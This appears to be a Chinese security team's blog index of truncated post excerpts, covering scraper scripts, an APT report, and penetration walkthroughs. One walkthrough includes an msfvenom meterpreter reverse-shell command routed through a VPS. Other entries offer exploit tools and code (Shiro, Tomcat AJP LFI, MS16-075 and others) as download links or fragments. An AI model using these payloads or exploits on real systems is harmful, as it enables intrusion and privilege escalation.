14x security Team

python smtplib邮件发送程序import smtplibfrom email.mime.text import MIMETextmsg_from="xx" pwd=""to="xx"subject="python邮件版"conntent="xxxx"msg=MIMEText(conntent)msg["Subject"]=subjectmsg[&...

jsonpath解析写python美女图片爬虫程序JsonPath是一种简单的方法来提取给定JSON文档的部分内容。 JsonPath有许多编程语言，如Javascript，Python和PHP，Java。JsonPath提供的json解析非常强大，它提供了类似正则表达式的语法，基本上可以满足所有你想要获得的json内容。下面我把官网介绍的每个表达式用代码实现，可以更直观的知道该怎么用它。需要导入的模块urllib.parserequestsjsonjsonpath定义一个u...

正则表达式re写便民查询网翻译python爬虫需要用到的模块：request urllib rere用于正则表达式模块放入一个header信息如：header={:}爬写方式，用到谷歌的F12,点击输入翻译抓包找到翻译的接口得到地址：https://www.woaifanyi.com/api/1.9/save/?ajaxtimestamp=1612505994032现在需要把 fromdata装入source:巴黎from:1to:2formdata={ : ...

APT追踪：当黑客不讲武德，安全专家也容易被骗事件影响26日，谷歌威胁分析小组披露了一系列来自东北亚某国黑客组织的针对安全研究人员(尤其是漏洞研究人员)的攻击活动。攻击者使用疑似Lazarus APT组织的攻击基础设施，结合非常具有迷惑性的社工操作，骗取受害者信任，并可能以盗取安全公司电脑上的高价值漏洞研究资料达到攻击目的。目前国内已有一定数量的安全研究人员受到这个组织的欺骗，其研究电脑的敏感信息泄露。技巧攻击攻击者为了与安全研究者建立互信并保持联系，首先会在一些社交...

记一次靶机漏洞的getshell逻辑代码分析过程首先是parmas变量类型函数，指向useraccount,实际上看到JcResetPass_checkSafeInfo.action是用来校验的地址那么实际上，我们只需要看这里，初始化变量type，如果data的结果为空，var _processing = false; var type = "0"; var submitType;  function change(type){  if...

记一次ms16075邪恶土豆提权windows2012服务器过程匿名权限2012服务器服务器系统是window2012的需要准备一台vps公网服务器，和一台kali虚拟机进行映射通信kali设置frp代理规则server填写公网服务器IP然后在在VPS启动frpKali转发6666到公网的1234端口配合MSF进行反弹开启kali的frp由MSF生成木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6...

old Team getshell上传工具，实现单个上传exp，和自动上传post功能漏洞由old Team发现的通用getshell漏洞，为了方便，写个工具测试...

Shiro_exploit-master shiro反序列化漏洞利用工具https://pan.baidu.com/s/1qK__lV_YEhdNs15z_GpFLA 提取码: aguv...

CNVD-2020-10487-Tomcat-Ajp-lfi.py#!/usr/bin/env python#CNVD-2020-10487  Tomcat-Ajp lfi#by ydhcuiimport struct# Some references:# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.htmldef pack_string(s):    if s is Non...

邪恶土豆MS16075 EXPhttps://pan.baidu.com/s/1O2tQg9AO0aWmWeIPvXv9oQ 提取码: 8v9aNC MS16032 MS13046 LCX 下载https://pan.baidu.com/s/1xEnJbrpmEsXIe0iwPjyDDA 提取码: 6ev2...